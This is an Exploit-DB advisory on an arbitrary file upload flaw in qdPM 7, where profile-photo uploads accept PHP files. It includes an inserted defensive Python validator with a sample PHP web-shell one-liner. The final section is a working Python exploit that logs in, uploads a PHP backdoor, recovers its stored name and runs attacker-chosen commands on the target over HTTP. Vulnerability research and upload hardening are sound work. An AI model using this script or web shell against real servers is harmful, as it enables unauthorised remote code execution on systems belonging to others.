qdPM 7 – Arbitrary File upload

Author: loneferret
Date: 2012-06-14
Category:
Platform:
Source: https://www.exploit-db.com/exploits/19154/
######################################################################################
# Exploit qdPM v.7 Arbitrary File upload
# Date: June 13th 2012
# Author: loneferret
# Version: 7
# Vendor Url: http://qdpm.net/
# Tested on: Windows XP / XAMPP
######################################################################################
# Discovered by: loneferret
######################################################################################

# Software description:
# Free project management tool for small teams.
# qdPM is a free web-based project management tool suitable for a small team working on multiple projects.
# It is fully configurable. You can easily manage Projects, Tasks and People. Customers interact
# using a Ticket System that is integrated into Task management.

# Vulnerability:
# The application does not verify the file's extension when uploading an image for a user's profile,
# so an authenticated user can upload a small PHP shell and then reach it remotely over HTTP.

# Note(s):
# A valid user account is needed to upload the file (a Client account will do).
# No authentication is needed to access the uploaded file.

# Uploading file:
# Once logged in, upload the file here:
# Page: /qdPM/index.php/home/myAccount

# Access file:
# The file can be found here:
# /qdPM/uploads/users/<filename>
#
# Note that the stored filename is prefixed with a random number. Look at the page
# source in the browser (the photo field of the account form) to find it.
# For example: <input type="file" name="users[photo]" value="171793-backdoor.php" id="users_photo" />
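The root cause is that the profile-photo handler keeps whatever extension the client sent and only prepends a random number. The Python below is an added illustration, not qdPM's code and not part of the original advisory: vulnerable_name reproduces the naming behaviour described above, and validate_profile_photo is the kind of check that closes the hole (extension allowlist, content sniffing, a server-chosen name). The allowed types, magic signatures and function names are assumptions made for the example; the sample uploads are constructed inline.

```python
import os
import re
import secrets

# Assumed policy for the example (not qdPM's own): a profile photo may only be
# one of these raster types, and its bytes must start with the matching signature.
ALLOWED_IMAGE_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def vulnerable_name(original_name, random_prefix):
    """The behaviour the advisory describes: the server keeps the client's
    extension untouched and only prepends a number, so 'backdoor.php' is stored
    as '171793-backdoor.php' under /uploads/users/ and PHP will execute it."""
    return "%d-%s" % (random_prefix, os.path.basename(original_name))


def validate_profile_photo(original_name, data, stored_token=None):
    """Hardened replacement. Returns the server-chosen name to store the file
    under, or raises UploadRejected. Checks, in order: the final extension is on
    the allowlist, the bytes carry that type's magic signature, and no PHP open
    tag is embedded (defence in depth against image/PHP polyglots)."""
    base = os.path.basename(original_name)          # drop any client-supplied path
    m = re.match(r"^[\w.-]+\.([A-Za-z0-9]+)$", base)
    if not m:
        raise UploadRejected("no usable extension: %r" % base)
    ext = m.group(1).lower()                        # 'shell.php.jpg' -> 'jpg'
    if ext not in ALLOWED_IMAGE_TYPES:
        raise UploadRejected("extension not allowed: %s" % ext)
    if not any(data.startswith(sig) for sig in ALLOWED_IMAGE_TYPES[ext]):
        raise UploadRejected("content does not look like a %s image" % ext)
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("PHP open tag inside image data")
    # A fresh random name also defeats the "read the filename out of the page
    # source" step: the stored name is no longer derived from the client's.
    token = stored_token if stored_token is not None else secrets.token_hex(16)
    return "%s.%s" % (token, ext)


def check_upload(original_name, data, stored_token="0123456789abcdef"):
    """Convenience wrapper: (True, stored_name) or (False, reason)."""
    try:
        return True, validate_profile_photo(original_name, data, stored_token)
    except UploadRejected as exc:
        return False, str(exc)


# Constructed sample uploads (not real captures): a bare PNG header, the PHP
# one-liner a PoC would upload, and a GIF/PHP polyglot.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 24
SAMPLE_SHELL = b"<?php system($_GET['cmd']); ?>\n"
SAMPLE_POLYGLOT = b"GIF89a" + SAMPLE_SHELL

if __name__ == "__main__":
    print("vulnerable naming:", vulnerable_name("backdoor.php", 171793))
    for name, data in [("me.png", SAMPLE_PNG),
                       ("backdoor.php", SAMPLE_SHELL),
                       ("backdoor.php.jpg", SAMPLE_SHELL),
                       ("avatar.gif", SAMPLE_POLYGLOT),
                       ("../../index.php", SAMPLE_SHELL)]:
        print("%-20s -> %s" % (name, check_upload(name, data)))
```

Storing the file under a server-chosen name with an allowlisted extension is necessary but not sufficient on its own: the upload directory should also be served without script execution (or live outside the web root), since the advisory's second point is that /qdPM/uploads/users/ is reachable without a session.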
    
    
    
----- python script -----
#!/usr/bin/python
# qdPM v.7 arbitrary file upload -> remote code execution (loneferret, 2012)
#
# Set EMAIL / PASSWORD to a valid (low-privilege) qdPM account and put the PHP
# file to upload next to this script as backdoor.php. The uploaded file is
# expected to run the command passed in the "cmd" query parameter.

from __future__ import print_function
import re
import sys
import mechanize

EMAIL = "loneferret@test.com"   # any valid account works; a Client login is enough
PASSWORD = "123456"
PAYLOAD = "backdoor.php"

print("\n[*] qdPM v.7 Remote Code Execution")
print("[*] Vulnerability discovered by loneferret")
print("[*] Offensive Security - http://www.offensive-security.com\n")

if len(sys.argv) != 3:
    print("[*] Usage: poc.py <RHOST> <RCMD>")
    sys.exit(0)

rhost = sys.argv[1]
rcmd = sys.argv[2]

# Log into the site
try:
    print("[*] Logging in ...")
    br = mechanize.Browser()
    br.set_handle_robots(False)
    br.open("http://%s/qdPM/index.php/home/login" % rhost)
    assert br.viewing_html()
    br.select_form(name="UsersForm")
    br.form["login[email]"] = EMAIL
    br.form["login[password]"] = PASSWORD
    br.submit()
except Exception as e:
    print("[-] Login failed: %s" % e)
    sys.exit(0)

# Upload the PHP file through the profile photo field; its extension is never checked
try:
    print("[*] Uploading shell ...")
    br.open("http://%s/qdPM/index.php/home/myAccount" % rhost)
    assert br.viewing_html()
    br.select_form(name="UsersAccountForm")
    br.form.add_file(open(PAYLOAD, "rb"), "text/plain", PAYLOAD, name="users[photo]")
    br.submit()
except Exception as e:
    print("[-] Upload didn't work: %s" % e)
    sys.exit(0)

# Recover the stored name: qdPM prefixes it with a random number and echoes it
# back in the photo field of the account form, e.g. value="171793-backdoor.php"
try:
    br.open("http://%s/qdPM/index.php/home/myAccount" % rhost)
    html = br.response().read().decode("utf-8", "ignore")
    m = re.search(r'name="users\[photo\]"\s+value="([^"]+)"', html)
    if not m:
        raise ValueError("could not find the stored filename in the page source")
    filename = m.group(1)
    print("[*] Filename is now: " + filename)

    # The upload directory is reachable without a session; the file runs as PHP
    url = "http://%s/qdPM/uploads/users/%s?cmd=%s" % (rhost, filename, rcmd)
    print("[*] Executing command:\n")
    print(br.open(url).read().decode("utf-8", "ignore"))
except Exception as e:
    print("[-] Oups... %s" % e)
    sys.exit(0)